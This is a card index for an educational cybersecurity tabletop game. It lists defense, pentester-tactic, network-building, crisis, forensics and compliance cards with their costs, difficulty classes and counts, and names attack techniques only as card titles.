Print one physical set and use it in both modules.

Distribution by tier (v2.2): 8 BASIC (D-01–06, D-19, D-23) / 8 ADVANCED (D-07–12, D-18, D-24) / 8 ELITE (D-13–17, D-20–22).

| Card ID | Title | Tier (Cost) | Vector |
|---|---|---|---|
| D-01 | Email Authentication Setup | BASIC (10) | SOCIAL ENGINEERING |
| D-02 | User Security Training | BASIC (10) | SOCIAL ENGINEERING |
| D-03 | Windows Update Patching | BASIC (10) | WEB EXPLOIT |
| D-04 | Network Firewall Rules | BASIC (10) | NETWORK |
| D-05 | Log Centralization | BASIC (10) | MALWARE |
| D-06 | Basic Antivirus Deployment | BASIC (10) | MALWARE |
| D-07 | Multi-Factor Authentication (MFA) | ADVANCED (15) | CREDENTIAL ABUSE |
| D-08 | EDR (Endpoint Detection & Response) | ADVANCED (15) | MALWARE |
| D-09 | Network Segmentation | ADVANCED (15) | NETWORK |
| D-10 | SIEM Correlation Rules | ADVANCED (15) | NETWORK |
| D-11 | Data Loss Prevention (DLP) | ADVANCED (15) | DATA EXFIL |
| D-12 | Password Manager & Vault | ADVANCED (15) | CREDENTIAL ABUSE |
| D-13 | Threat Hunting Program | ELITE (25) | MALWARE |
| D-14 | Memory Forensics | ELITE (25) | MALWARE |
| D-15 | Deception Technology (Honeypots) | ELITE (25) | NETWORK |
| D-16 | Credential Guard & Secure Boot | ELITE (25) | CREDENTIAL ABUSE |
| D-17 | Advanced Malware Sandbox | ELITE (25) | MALWARE |
| D-18 | Intrusion Prevention System (IPS) | ADVANCED (15) | WEB EXPLOIT |
| D-19 | Backup & Disaster Recovery | BASIC (10) | MALWARE |
| D-20 | Zero Trust Access Control | ELITE (25) | CREDENTIAL ABUSE |
| D-21 | Container Security & Orchestration | ELITE (25) | MALWARE |
| D-22 | Security Information & Event Management (SIEM) | ELITE (25) | NETWORK |
| D-23 | IR Program & Runbooks | BASIC (10) | NETWORK |
| D-24 | Threat Intelligence Integration | ADVANCED (15) | NETWORK + DATA EXFIL (dual-tagged) |

Distribution by vector (v2.2): SOCIAL ENGINEERING 2 · WEB EXPLOIT 2 · CREDENTIAL ABUSE 4 · MALWARE 8 · NETWORK 7 · DATA EXFIL 2. D-24 is dual-tagged (NETWORK + DATA EXFIL), so vector tags sum to 25 across 24 cards.


Hardening Module

Module total: 16 tactic cards + the Shared Defense Deck (24 cards, indexed above).

| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Defense Cards (shared) | defense-cards.md | D-01 – D-24 | 24 | Same deck as IR core — see Shared Defense Deck |
| Core Pentester Tactics | pentester-tactic-cards.md | PT-01 – PT-08 | 8 | Red-team tactics that test deployed defenses (d20 vs DC) |
| Expansion Tactics | advanced-tactics.md | PT-09 – PT-16 | 8 | Multi-vector, zero-day, ransomware, APT, cloud/IoT/firmware/container attacks |

Core Pentester Tactic Deck (PT-01 – PT-08)

| Card ID | Title | Difficulty (DC) | Target Vectors |
|---|---|---|---|
| PT-01 | Social Engineering - Pretexting Attack | BASIC (DC 12) | SOCIAL_ENGINEERING, CREDENTIAL_ABUSE |
| PT-02 | Malware Evasion - Living-off-the-Land Technique | INTERMEDIATE (DC 13) | MALWARE, CREDENTIAL_ABUSE |
| PT-03 | Credential Dumping - Mimikatz Attack | INTERMEDIATE (DC 13) | CREDENTIAL_ABUSE, MALWARE |
| PT-04 | Lateral Movement - Network Traversal | INTERMEDIATE (DC 13) | NETWORK, CREDENTIAL_ABUSE |
| PT-05 | Privilege Escalation - Unpatched Kernel Exploit | ADVANCED (DC 14) | MALWARE, WEB_EXPLOIT |
| PT-06 | Data Exfiltration - Unmonitored Channel | ADVANCED (DC 14) | DATA_EXFIL, NETWORK |
| PT-07 | Supply Chain Compromise - Trusted Software Update | ADVANCED (DC 14) | MALWARE, WEB_EXPLOIT |
| PT-08 | Insider Threat - Malicious Administrator | EXPERT (DC 15) | CREDENTIAL_ABUSE, DATA_EXFIL, NETWORK |

Expansion Tactic Deck (PT-09 – PT-16)

| Card ID | Title | Difficulty (DC) | Target Vectors |
|---|---|---|---|
| PT-09 | Multi-Vector Attack - Coordinated Campaign | ADVANCED (DC 14) | Multiple (per-phase rolls) |
| PT-10 | Zero-Day Exploitation - Unknown Vulnerability | EXPERT (DC 15) | MALWARE, WEB_EXPLOIT |
| PT-11 | Ransomware Deployment & Encryption | EXPERT (DC 15) | MALWARE, DATA_EXFIL, NETWORK |
| PT-12 | APT Campaign - Multi-Turn Persistent Threat | EXPERT+ (DC 16, escalates +1/turn undetected) | Multiple |
| PT-13 | Cloud-Specific Attack - Misconfigured Cloud Resources | ADVANCED (DC 14) | Multiple |
| PT-14 | IoT/OT Compromise - Industrial Network Attack | ADVANCED (DC 14) | NETWORK, MALWARE |
| PT-15 | Firmware/BIOS Attack - Bootloader Compromise | EXPERT (DC 15) | MALWARE, NETWORK |
| PT-16 | Privilege Escalation - Containerized Environment Escape | EXPERT (DC 15) | MALWARE, NETWORK |

Network Building Module

Module total: 77 cards (33 core + 8 expansion + 36 standalone).

| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Servers | server-cards.md | SRV-01 – SRV-10 | 10 | Server types with cost, capacity, complexity, and availability |
| Security Devices | security-device-cards.md | SEC-01 – SEC-10 | 10 | Security appliances with cost, vectors covered, and placement |
| Architectures | architecture-cards.md | ARCH-01 – ARCH-05 | 5 | Network topology choices with cost/complexity trade-offs |
| Assets | asset-cards.md | ASSET-01 – ASSET-08 | 8 | Business functions the network must support |
| Legacy Systems (exp.) | legacy-systems.md | LEGACY-01 – LEGACY-04 | 4 | Unpatched, mission-critical legacy burdens |
| Cloud Variants (exp.) | cloud-variants.md | CLOUD-01 – CLOUD-04 | 4 | Modern cloud deployment alternatives |
| Business Requirements (standalone) | business-requirement-cards.md | REQ-01 – REQ-20 | 20 | Draw-deck requirements for standalone play |
| Operational Events (standalone) | operational-event-cards.md | EVT-01 – EVT-16 | 16 | Draw-deck operational events for standalone play |

Server Cards (SRV-01 – SRV-10)

| Card ID | Title | Cost | Key Risk |
|---|---|---|---|
| SRV-01 | Email Server | 8 | Phishing, Credential Abuse |
| SRV-02 | Web Server | 7 | Web Exploits, RCE |
| SRV-03 | Database Server | 10 | SQL Injection, Data Exfil |
| SRV-04 | File Server | 6 | SMB Laterals, Ransomware |
| SRV-05 | Domain Controller | 12 | Mimikatz, Complete Compromise |
| SRV-06 | Development Server | 5 | Lateral Movement, Data Leak |
| SRV-07 | Backup Server | 9 | Ransomware, Recovery Failure |
| SRV-08 | Cloud Workload | 4 | Misconfiguration, IAM Abuse |
| SRV-09 | Legacy System | 3 | Known Vulns, Cannot Patch |
| SRV-10 | Honeypot Decoy | 7 | Detection, Early Warning |

Security Device Cards (SEC-01 – SEC-10)

| Card ID | Title | Cost | Primary Vectors / Placement |
|---|---|---|---|
| SEC-01 | Firewall (Perimeter) | 12 | NETWORK, CREDENTIAL / Perimeter |
| SEC-02 | Intrusion Detection System (IDS) | 10 | MALWARE, NETWORK / Internal |
| SEC-03 | Intrusion Prevention System (IPS) | 14 | MALWARE, WEB, NETWORK / Internal |
| SEC-04 | Load Balancer | 8 | NETWORK (availability) / Web Tier |
| SEC-05 | VPN Gateway | 9 | CREDENTIAL, NETWORK / Perimeter |
| SEC-06 | Email Gateway | 6 | SOCIAL_ENG, MALWARE / Perimeter |
| SEC-07 | Web Application Firewall (WAF) | 11 | WEB, MALWARE / Web Tier |
| SEC-08 | Network Segmentation Switch | 10 | CREDENTIAL, NETWORK / Internal |
| SEC-09 | SIEM (Security Information & Event Management) | 15 | Multiple (detection) / Central |
| SEC-10 | Honeypot Network | 8 | NETWORK (detection) / Isolated |

Architecture Cards (ARCH-01 – ARCH-05)

| Card ID | Title | Cost | Complexity |
|---|---|---|---|
| ARCH-01 | Flat Network (Traditional) | 0 | 1/5 |
| ARCH-02 | Segmented 3-Zone (DMZ Model) | 5 | 2/5 |
| ARCH-03 | Fully Isolated (Zero Trust Model) | 12 | 4/5 |
| ARCH-04 | Cloud Hybrid (Mixed On-Premises & Cloud) | 8 | 3/5 |
| ARCH-05 | Cloud First (Cloud-Only Infrastructure) | 6 | 2/5 |

Asset Cards (ASSET-01 – ASSET-08)

| Card ID | Title | Criticality | Fulfilled By |
|---|---|---|---|
| ASSET-01 | Email | High | SRV-01 |
| ASSET-02 | Web | Medium | SRV-02 |
| ASSET-03 | Database | Very High | SRV-03 |
| ASSET-04 | File Storage | High | SRV-04 |
| ASSET-05 | Identity | Very High | SRV-05 |
| ASSET-06 | Development | Medium | SRV-06 |
| ASSET-07 | Disaster Recovery | Very High | SRV-07 |
| ASSET-08 | VPN/Remote Access | Medium | SEC-05 |

Legacy System Cards (LEGACY-01 – LEGACY-04, Expansion)

| Card ID | Title | Cost | Key Challenge |
|---|---|---|---|
| LEGACY-01 | Mainframe System | 15 | Cannot patch, mission-critical |
| LEGACY-02 | Custom Business Application | 8 | Vendor no longer exists |
| LEGACY-03 | Industrial Control System (ICS) | 12 | Real-time + safety-critical |
| LEGACY-04 | Obsolete Operating System | 5 | All vulnerabilities public |

Cloud Variant Cards (CLOUD-01 – CLOUD-04, Expansion)

| Card ID | Title | Cost | Primary Benefit |
|---|---|---|---|
| CLOUD-01 | Containerized Microservices | 6 | Scalability & Velocity |
| CLOUD-02 | Serverless/Function-as-a-Service | 3 | Simplicity & Cost |
| CLOUD-03 | Database-as-a-Service (Managed Database) | 5 | Reliability & Compliance |
| CLOUD-04 | Content Delivery Network (CDN) | 4 | Performance & DDoS Protection |

Business Requirement Cards (REQ-01 – REQ-20, Standalone)

| Card ID | Title | Satisfied By | Missed Penalty |
|---|---|---|---|
| REQ-01 | New Product Launch Website | Web Server or cloud web | -5 |
| REQ-02 | Customer Data Acquisition | Database (dedicated or cloud) | -10 |
| REQ-03 | Work-From-Home Program | VPN Gateway | -3 |
| REQ-04 | Remote Workforce Mandate | VPN Gateway + Domain Controller | -5 |
| REQ-05 | HIPAA Compliance Mandate | Backup + segmentation | -10 |
| REQ-06 | PCI Scope: Cardholder Data | Database + Firewall/Segmentation | -10 |
| REQ-07 | 99.9% Uptime SLA | Load Balancer or duplicate server | -5 |
| REQ-08 | M&A: Integrate Acquired Network | 2 spare slots or new server | -10 |
| REQ-09 | Scale Email System | 2nd Email Server / LB / cloud email | -5 |
| REQ-10 | Security Audit Ordered | SIEM, or IDS + Email Gateway | -5 |
| REQ-11 | Board Demands IR Readiness | IDS, IPS, or SIEM | -10 |
| REQ-12 | Ransomware Wave in Sector | Backup + detection | -20 |
| REQ-13 | New Subsidiary Office | VPN Gateway | -5 |
| REQ-14 | E-Commerce Expansion | Web + WAF | -5 |
| REQ-15 | Developer Hiring Spree | Dev Server or overload | -3 |
| REQ-16 | Records-Retention Regulation | File storage + Backup | -5 |
| REQ-17 | Single Sign-On Rollout | Domain Controller | -5 |
| REQ-18 | Cyber-Insurance Renewal | Backup + Email Gateway + detection | -5 (met: +5) |
| REQ-19 | Threat-Intel Pilot | Honeypot | 0 (met: +5) |
| REQ-20 | Data-Center Consolidation | Any cloud-hosted service | -3 (met: +3) |

Operational Event Cards (EVT-01 – EVT-16, Standalone)

| Card ID | Title | Effect (Unmitigated) | Mitigated By |
|---|---|---|---|
| EVT-01 | Email Server Failure | Pay 5 or -10 pts | Redundant/cloud email |
| EVT-02 | Traffic Spike | -5 pts (or +5 if ready) | LB / CDN / redundant web |
| EVT-03 | Phishing Wave | -10 pts (or +5 if ready) | Email Gateway |
| EVT-04 | Cloud Vendor Outage | -5 pts if cloud-only service | On-prem redundancy |
| EVT-05 | Budget Cut | -5 Budget | Contingency reserve |
| EVT-06 | Emergency Funds | +10 Budget | |
| EVT-07 | Security Grant | +5 Budget if Backup | |
| EVT-08 | File Server Filling Up | Buy capacity or -5 pts | Spare capacity |
| EVT-09 | Honeypot Triggers | +5 pts if honeypot | |
| EVT-10 | Insider Snooping | -5 pts (or +5 if ready) | SIEM / segmentation |
| EVT-11 | Ransomware Strikes | -20 pts | Backup (+ detection: +5) |
| EVT-12 | IT Staff Burnout | Max 1 deploy this turn | Completed builds |
| EVT-13 | Vendor Promotion | Next device -2 cost | |
| EVT-14 | New Hire Needs Remote Access | -3 pts | VPN Gateway |
| EVT-15 | Hardware Recall | Pay 3 or server offline | Redundancy / cloud |
| EVT-16 | Quiet Quarter | Nothing | |

Disaster Recovery Module

Module total: 38 cards (30 core + 8 expansion scenarios).

| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Crisis Actions | crisis-action-cards.md | ACTION-01 – ACTION-13 | 13 | Investigation, Remediation, Communication actions plus the Ransom Decision |
| Event Timeline | event-cards.md | EVENT-01 – EVENT-12 | 12 | 6 Scheduled + 6 Triggered crisis events on the 8-turn Crisis Clock |
| Stakeholders | stakeholder-cards.md | STAKE-01 – STAKE-05 | 5 | Trust meters for the five stakeholder groups |
| Advanced Scenarios (exp.) | advanced-scenarios.md | SCENARIO-01 – SCENARIO-08 | 8 | High/extreme-difficulty crisis setups |

Crisis Action Cards (ACTION-01 – ACTION-13)

| Card ID | Title | Category | Cost | Advance | Duration |
|---|---|---|---|---|---|
| ACTION-01 | Forensic Analysis | Investigation | 12 | +25% | 2 turns |
| ACTION-02 | Threat Hunting | Investigation | 8 | +15% | 1 turn |
| ACTION-03 | Log Analysis | Investigation | 5 | +10% | 1 turn |
| ACTION-04 | Third-Party Incident Response Engagement | Investigation | 20 | +30% Inv / +20% Rem | 3 turns |
| ACTION-05 | Patch & Harden (Affected Systems) | Remediation | 10 | +20% | 1 turn |
| ACTION-06 | Containment (Isolate Compromised Systems) | Remediation | 8 | +15% | 1 turn |
| ACTION-07 | System Rebuild/Recovery from Backup | Remediation | 15 | +25% | 2 turns |
| ACTION-08 | Change Credentials & Access Controls | Remediation | 6 | +12% | 1 turn |
| ACTION-09 | Customer Notification | Communication | 10 | +20% | 1 turn |
| ACTION-10 | Regulatory/Law Enforcement Notification | Communication | 8 | +10% | 1 turn |
| ACTION-11 | Media/Public Relations Management | Communication | 12 | +15% | 1 turn |
| ACTION-12 | Board & Shareholder Communication | Communication | 9 | +12% | 1 turn |
| ACTION-13 | Ransom Decision (v2.2) | Crisis Decision | 0/5/20 | Pay: +20% Rem | Instant (once per game) |

Standing rule (not a card): the free Holding Statement — Communication, 0 Budget, +5%.

Event Timeline Cards (EVENT-01 – EVENT-12)

| Card ID | Title | Kind | Turn / Trigger |
|---|---|---|---|
| EVENT-01 | First Media Coverage | Scheduled | Turn 2 |
| EVENT-02 | Regulatory 72-Hour Deadline | Scheduled | Turn 6 (deadline Turn 8) |
| EVENT-03 | Customer Notification Window | Scheduled | Turn 5 |
| EVENT-04 | Board Meeting | Scheduled | Turn 3 |
| EVENT-05 | Customer Class Action Lawsuit | Triggered | Customers un-notified after T5 or trust <20% |
| EVENT-06 | Regulatory Fine | Triggered | Regulator trust <20% |
| EVENT-07 | Media Frenzy | Triggered | Media <20% or silent through T3 |
| EVENT-08 | Second Breach Discovered | Triggered | T6: Remediation <30%, no rebuild |
| EVENT-09 | Shareholder Pressure | Scheduled | Turn 5 (public co.) |
| EVENT-10 | Competitor Advantage | Triggered | Customer trust <40% from T5 |
| EVENT-11 | Key Executive Resignation | Triggered | Executive trust <30% |
| EVENT-12 | Government Subpoena | Scheduled | Turn 7 (med/large org) |

Stakeholder Cards (STAKE-01 – STAKE-05)

| Card ID | Title | Type | Starting Trust |
|---|---|---|---|
| STAKE-01 | Customers | External | 50% |
| STAKE-02 | Regulators | Government | 60% |
| STAKE-03 | Media / Public | External | 40% |
| STAKE-04 | Board of Directors | Internal | 70% |
| STAKE-05 | Executive Leadership | Internal | 80% |

Advanced Scenario Cards (SCENARIO-01 – SCENARIO-08, Expansion)

| Card ID | Title | Difficulty | Key Pressure |
|---|---|---|---|
| SCENARIO-01 | Multi-Region Breach with Data Sovereignty Issues | HIGH | 3 different regulatory timelines |
| SCENARIO-02 | Ransomware with Extortion Threat | HIGH | $10M decision + data publication threat |
| SCENARIO-03 | Supply Chain Compromise (Vendor Breach Affects Customers) | HIGH | Vendor failure, customer trust |
| SCENARIO-04 | Insider Threat Revealed Mid-Crisis | HIGH | Organizational trust collapse |
| SCENARIO-05 | Critical Infrastructure Breach (Safety/Lives at Risk) | EXTREME | Lives at risk, government control |
| SCENARIO-06 | Stock Price Crash (Public Company Panic) | HIGH | Financial crisis + board pressure |
| SCENARIO-07 | Ransomware + Data Breach + Business Email Compromise | EXTREME | 3 simultaneous attacks, multiple ransoms |
| SCENARIO-08 | Breach During Merger/Acquisition | EXTREME | Deal value + regulatory blocks |

Forensics Module

Module total: 28 core cards (12 Investigation + 12 Evidence + 4 Findings). Expansion deck: PLANNED — not yet available (no card file exists yet; see the module README's design notes).

| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Investigation Actions | investigation-cards.md | DISK-01/02, MEM-01/02, LOG-01/02, NET-01/02, MALW-01/02, TIMELINE-01, THREAT-01 | 12 | Forensic techniques rolled d20 vs DC, with Budget cost and Duration |
| Evidence & Findings | evidence-cards.md | EVD-01 – EVD-12, FIND-01 – FIND-04 | 16 | Discovered evidence artifacts and synthesis/conclusion cards |

Investigation Action Cards (12)

| Card ID | Title | DC | Cost | Duration |
|---|---|---|---|---|
| DISK-01 | Disk Image & Analysis | 12 | 10 | 2 turns (rush: +5 Budget for 1) |
| DISK-02 | File System Carving | 14 | 15 | 3 turns |
| MEM-01 | Memory Dump & Analysis | 13 | 15 | 2 turns |
| MEM-02 | Memory Forensics Deep Dive | 15 | 20 | 3 turns |
| LOG-01 | Event Log Analysis | 11 | 5 | 1 turn |
| LOG-02 | Deep Log Correlation | 13 | 10 | 2 turns |
| NET-01 | Network Traffic Analysis | 12 | 10 | 2 turns |
| NET-02 | Packet Capture Deep Analysis | 14 | 15 | 3 turns |
| MALW-01 | Malware Analysis (Dynamic) | 12 | 15 | 2 turns |
| MALW-02 | Malware Analysis (Static) | 14 | 10 | 2 turns |
| TIMELINE-01 | Timeline Reconstruction | 13 | 5 | 1 turn |
| THREAT-01 | Threat Attribution Analysis | 15 | 20 | 3 turns |

Evidence Cards (EVD-01 – EVD-12)

| Card ID | Title | Type |
|---|---|---|
| EVD-01 | Credential Dumper Malware | Malware & Persistence |
| EVD-02 | Command-and-Control Callback Domain | Attack Infrastructure |
| EVD-03 | Persistence Mechanism (Scheduled Task) | Malware & Persistence |
| EVD-04 | Suspicious Admin Login (Timeline) | Credentials & Access |
| EVD-05 | Lateral Movement Evidence (Pass-the-Hash) | Lateral Movement |
| EVD-06 | Data Exfiltration Evidence | Exfiltration |
| EVD-07 | Attacker Infrastructure Map | Attack Infrastructure |
| EVD-08 | Encryption Keys Recovered | Malware & Persistence |
| EVD-09 | Attacker Command History | Attack Activity |
| EVD-10 | Malware Behavior Profile | Malware & Persistence |
| EVD-11 | File Staging Artifacts | Attack Activity |
| EVD-12 | Anti-Forensics Evidence | Attack Activity |

Findings Cards (FIND-01 – FIND-04)

| Card ID | Title | Triggered When |
|---|---|---|
| FIND-01 | Threat Attribution Report | Attribution Confidence ≥ 70% |
| FIND-02 | Attack Surface Analysis | Attack Chain ≥ 75% |
| FIND-03 | Persistence Mechanisms Discovered | Multiple persistence artifacts found |
| FIND-04 | Investigative Gaps & Recommendations | Investigation completes (Victory or Failure) |

Audit & Compliance Module

Module total: 25 cards (6 core + 19 expansion). The expansion — 11 framework cards and 8 remediation cards — lives entirely in one file.

| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Audit Domains | audit-domain-cards.md | DOMAIN-01 – DOMAIN-06 | 6 | Domain assessments scored 1-5 stars with PASS/FAIL mapping |
| Frameworks & Remediation (exp.) | compliance-frameworks.md | FRAMEWORK-NIST-01–05, FRAMEWORK-CIS-01–03, FRAMEWORK-PCI-01–03, REMEDIATION-01–08 | 19 | Framework assessment variants (5 NIST + 3 CIS + 3 PCI) plus 8 remediation actions |

Audit Domain Cards (DOMAIN-01 – DOMAIN-06)

| Card ID | Title | Focus |
|---|---|---|
| DOMAIN-01 | Network Segmentation & Isolation | Network zones, lateral movement prevention |
| DOMAIN-02 | Access Control & Identity Management | MFA, credential policy |
| DOMAIN-03 | Threat Detection & Incident Response | SIEM, breach detection |
| DOMAIN-04 | Backup & Disaster Recovery | Backups, ransomware resilience |
| DOMAIN-05 | Third-Party Risk & Cloud Security | Vendor and supply chain risk |
| DOMAIN-06 | Security Operations & Monitoring | Security team, sustained posture |

Compliance Framework Cards (11, Expansion)

| Card ID | Title | Focus |
|---|---|---|
| FRAMEWORK-NIST-01 | Identify Function | Asset inventory and risk assessment |
| FRAMEWORK-NIST-02 | Protect Function | Preventive security controls |
| FRAMEWORK-NIST-03 | Detect Function | Detecting attacks as they happen |
| FRAMEWORK-NIST-04 | Respond Function | Responding to breaches/attacks |
| FRAMEWORK-NIST-05 | Recover Function | Recovery and improvement |
| FRAMEWORK-CIS-01 | Safeguards 1-6 (Foundations) | Basic security practices |
| FRAMEWORK-CIS-02 | Safeguards 7-13 (Advanced Defenses) | IR, supply chain, defense tools |
| FRAMEWORK-CIS-03 | Safeguards 14-18 (Operations & Governance) | Operational controls |
| FRAMEWORK-PCI-01 | Infrastructure Security (Requirements 1-4) | Network/system security for cardholder data |
| FRAMEWORK-PCI-02 | Access & Operations (Requirements 5-10) | Access control and operations |
| FRAMEWORK-PCI-03 | Testing & Compliance (Requirements 11-12) | Testing, monitoring, compliance management |

Remediation Action Cards (REMEDIATION-01 – REMEDIATION-08, Expansion)

| Card ID | Title | Cost |
|---|---|---|
| REMEDIATION-01 | Implement MFA | 5 |
| REMEDIATION-02 | Deploy SIEM | 15 |
| REMEDIATION-03 | Implement Network Segmentation | 12 |
| REMEDIATION-04 | Backup & Disaster Recovery | 10 |
| REMEDIATION-05 | Security Training Program | 3 |
| REMEDIATION-06 | Vendor Security Assessment | 5 |
| REMEDIATION-07 | Vulnerability Management Program | 8 |
| REMEDIATION-08 | Incident Response Plan & Team | 12 |

Card Count Summary

| Module | Core | Expansion | Standalone | Total |
|---|---|---|---|---|
| Incident Response | 12 threats + 24 defenses* | 8 threats + 19 defenses | | 63 |
| Hardening | 8 tactics (+ shared 24 defenses*) | 8 tactics | | 16 (+24 shared) |
| Network Building | 33 | 8 | 36 | 77 |
| Disaster Recovery | 30 | 8 | | 38 |
| Forensics | 28 | planned | | 28 |
| Audit & Compliance | 6 | 19 | | 25 |

* The 24 defense cards (D-01 – D-24) are one shared deck counted once (under Incident Response) in the 247-card grand total.


License & Attribution

All cards are licensed under CC BY-NC-SA 4.0 (Creative Commons Attribution-NonCommercial-ShareAlike).
